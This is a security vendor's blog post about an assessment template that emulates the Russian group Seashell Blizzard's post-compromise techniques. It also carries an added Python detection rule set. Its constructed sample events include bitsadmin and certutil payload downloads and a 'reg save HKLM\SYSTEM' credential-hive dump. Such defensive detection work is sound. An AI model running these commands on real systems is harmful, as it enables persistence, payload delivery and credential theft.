
Emulating the Sophisticated Russian Adversary Seashell Blizzard
Published
April 2, 2025
AttackIQ has released a new assessment template that emulates the various post-compromise Tactics, Techniques, and Procedures (TTPs) associated with the sabotage-motivated Russian adversary Seashell Blizzard.
Seashell Blizzard, also known as APT44, Sandworm, and Voodoo Bear, is a highly sophisticated Russian adversary linked to the Russian Military Intelligence Unit 74455 (GRU). Since at least 2009, Seashell Blizzard has targeted organizations across the United States, Canada, Australia, Europe, Central Asia, and the Middle East, focusing on sectors such as energy, telecommunications, government, military, transportation, manufacturing, and retail. Seashell Blizzard operations are characterized by persistent, long-term access to victim networks, employing a range of publicly available and custom-developed tools to conduct espionage activities. The group has a particular focus on Industrial Control Systems (ICS) and Supervisory Control and Data Acquisition (SCADA) systems, and its attacks have resulted in significant disruptions to critical infrastructure, including energy distribution systems.
AttackIQ has released a new assessment template that brings together the post-compromise Tactics, Techniques, and Procedures (TTPs) exhibited by Seashell Blizzard during the BadPilot campaign to help customers validate their security controls and their ability to defend against this disruptive and destructive threat.
Validating your security program performance against these behaviors is vital in reducing risk. By using this new assessment template in the AttackIQ Security Optimization Platform, security teams will be able to:
- Evaluate security control performance against recently active Russian APT activity.
- Assess their security posture against an adversary focused on critical sectors.
- Continuously validate detection and prevention pipelines against a threat that conducts espionage operations globally.
Seashell Blizzard – 2025-02 – The BadPilot Campaign
The BadPilot campaign is a sophisticated, long-running operation primarily focused on gaining initial access to targeted networks. The campaign is attributed to a Seashell Blizzard subgroup and is known for its strategic use of spear-phishing emails and exploiting vulnerabilities in software to breach networks. Once access is established, they typically provide a foothold for other threat actors within the group to conduct further exploitation and espionage activities.
This emulation reflects all post-compromise Tactics, Techniques, and Procedures (TTPs) exhibited by Seashell Blizzard during this campaign, as detailed in Microsoft’s investigation report published on February 12, 2025.
The assessment template is divided into tactics, grouping the techniques and implementations used by the group at each stage of their activities.
Persistence
Consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access.
Create or Modify System Process: Windows Service (T1543.003): This scenario leverages the native sc command line tool to create a new service and then queries it to verify that the service was created correctly.
Defense Evasion
Consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts.
BITS Jobs (T1197): This scenario employs the bitsadmin native command to create a BITS job and configure it to download a remote payload. The Background Intelligent Transfer Service (BITS) is a mechanism used by legitimate applications to use a system’s idle bandwidth to retrieve files without disrupting other applications.
System Network Configuration Discovery: Internet Connection Discovery (T1016.001): This scenario executes the certutil utility to attempt to download a file from a website and save it to a temporary directory.
Credential Access
Consists of techniques used by adversaries to harvest credentials available on the compromised system.
OS Credential Dumping: Security Account Manager (T1003.002): This scenario attempts to save a copy of the HKLM\SYSTEM registry hive to a temporary file by executing the native Windows reg save command.
Discovery
Consists of techniques that adversaries use to discover information related to the compromised environment.
System Owner/User Discovery (T1033): This scenario executes the native whoami command to retrieve details of the running user account.
System Information Discovery (T1082): This scenario executes the systeminfo command to collect information about the compromised system.
System Network Configuration Discovery (T1016): This scenario executes the arp -a command to retrieve the system’s Address Resolution Protocol (ARP) cache, which can reveal valuable network details.
Command and Control
Consists of techniques that adversaries may use to communicate with systems under their control within a victim network. Adversaries commonly attempt to mimic normal, expected traffic to avoid detection.
Ingress Tool Transfer (T1105): Two separate scenarios, one that downloads a known malicious sample to memory and one that saves it to disk, test whether network and endpoint controls can prevent the delivery of known malicious samples.
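A defender-side example, added here and not part of AttackIQ's template or the original post: a small rule set that flags the emulated command lines described in the Persistence, Defense Evasion, Credential Access and Discovery sections above when they appear in process-creation telemetry. The event fields and sample command lines are constructed for illustration and are not real telemetry.

```python
import re
from collections import namedtuple

# Constructed sample process-creation events (Sysmon Event ID 1 style);
# written for this example, not captured from a real host.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\sc.exe",
     "CommandLine": r'sc create UpdaterSvc binPath= "C:\Users\Public\u.exe" start= auto'},
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /transfer job1 /download /priority high http://example.invalid/p.bin C:\Users\Public\p.bin"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -urlcache -split -f http://example.invalid/t.txt C:\Windows\Temp\t.txt"},
    {"Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg save HKLM\SYSTEM C:\Windows\Temp\sys.hiv"},
    {"Image": r"C:\Windows\System32\whoami.exe", "CommandLine": "whoami"},
    {"Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs"},  # benign, must not match
]

# Each rule: ATT&CK technique ID, description, case-insensitive regex over the command line.
# The patterns mirror the scenarios in the assessment template described above.
RULES = [
    ("T1543.003", "Service creation via sc.exe", r"^\s*sc(\.exe)?\s+create\b"),
    ("T1197", "BITS job download via bitsadmin", r"bitsadmin(\.exe)?\s+.*(/transfer|/addfile|/create)"),
    ("T1016.001", "certutil used to fetch a URL", r"certutil(\.exe)?\s+.*-urlcache\b"),
    ("T1003.002", "reg save of SYSTEM or SAM hive", r"reg(\.exe)?\s+save\s+hklm\\(system|sam)\b"),
    ("T1033", "whoami executed", r"^\s*whoami(\.exe)?(\s|$)"),
    ("T1082", "systeminfo executed", r"^\s*systeminfo(\.exe)?(\s|$)"),
    ("T1016", "ARP cache listing", r"^\s*arp(\.exe)?\s+-a\b"),
]

Hit = namedtuple("Hit", "technique description command")


def match_events(events):
    """Return one Hit per (event, rule) pair whose command line matches the rule."""
    hits = []
    for ev in events:
        cmd = ev.get("CommandLine", "")
        for tid, desc, pattern in RULES:
            if re.search(pattern, cmd, re.IGNORECASE):
                hits.append(Hit(tid, desc, cmd))
    return hits


if __name__ == "__main__":
    for hit in match_events(SAMPLE_EVENTS):
        print(f"{hit.technique:10} {hit.description:35} {hit.command}")
```

The whoami, systeminfo and arp rules will fire on routine administration as well, so in production they are better scored as weak signals and correlated with the higher-confidence sc, bitsadmin, certutil and reg save matches from the same host and session.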
Wrap Up
In summary, this assessment template will evaluate security and incident response processes and support the improvement of your security control posture against the behaviors exhibited by Seashell Blizzard. With data generated from continuous testing and the use of this assessment template, you can focus your teams on achieving key security outcomes, adjust your security controls, and work to elevate your total security program effectiveness against a known and disruptive threat.
AttackIQ, the leading provider of Adversarial Exposure Validation (AEV) solutions, is trusted by top organizations worldwide to validate security controls in real time. By emulating real-world adversary behavior, AttackIQ closes the gap between knowing about a vulnerability and understanding its true risk. AttackIQ’s AEV platform aligns with the Continuous Threat Exposure Management (CTEM) framework, enabling a structured, risk-based approach to ongoing security assessment and improvement. The company is committed to supporting its MSSP partners with a Flexible Preactive Partner Program that provides turn-key solutions, empowering them to elevate client security. AttackIQ is passionate about giving back to the cybersecurity community through its free award-winning AttackIQ Academy and founding research partnership with MITRE Center for Threat-Informed Defense.
This is a Security Bloggers Network syndicated blog from AttackIQ authored by Ayelen Torello. Read the original post at: https://www.attackiq.com/2025/04/02/emulating-seashell-blizzard/